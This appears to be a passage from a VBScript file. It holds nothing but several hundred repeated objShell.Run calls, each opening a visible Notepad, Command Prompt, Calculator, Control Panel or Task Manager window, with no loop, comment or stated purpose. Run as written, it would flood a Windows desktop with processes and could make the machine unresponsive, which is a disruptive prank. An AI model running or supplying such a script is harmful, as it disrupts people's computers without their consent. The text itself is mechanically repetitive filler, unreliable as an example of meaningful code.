objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
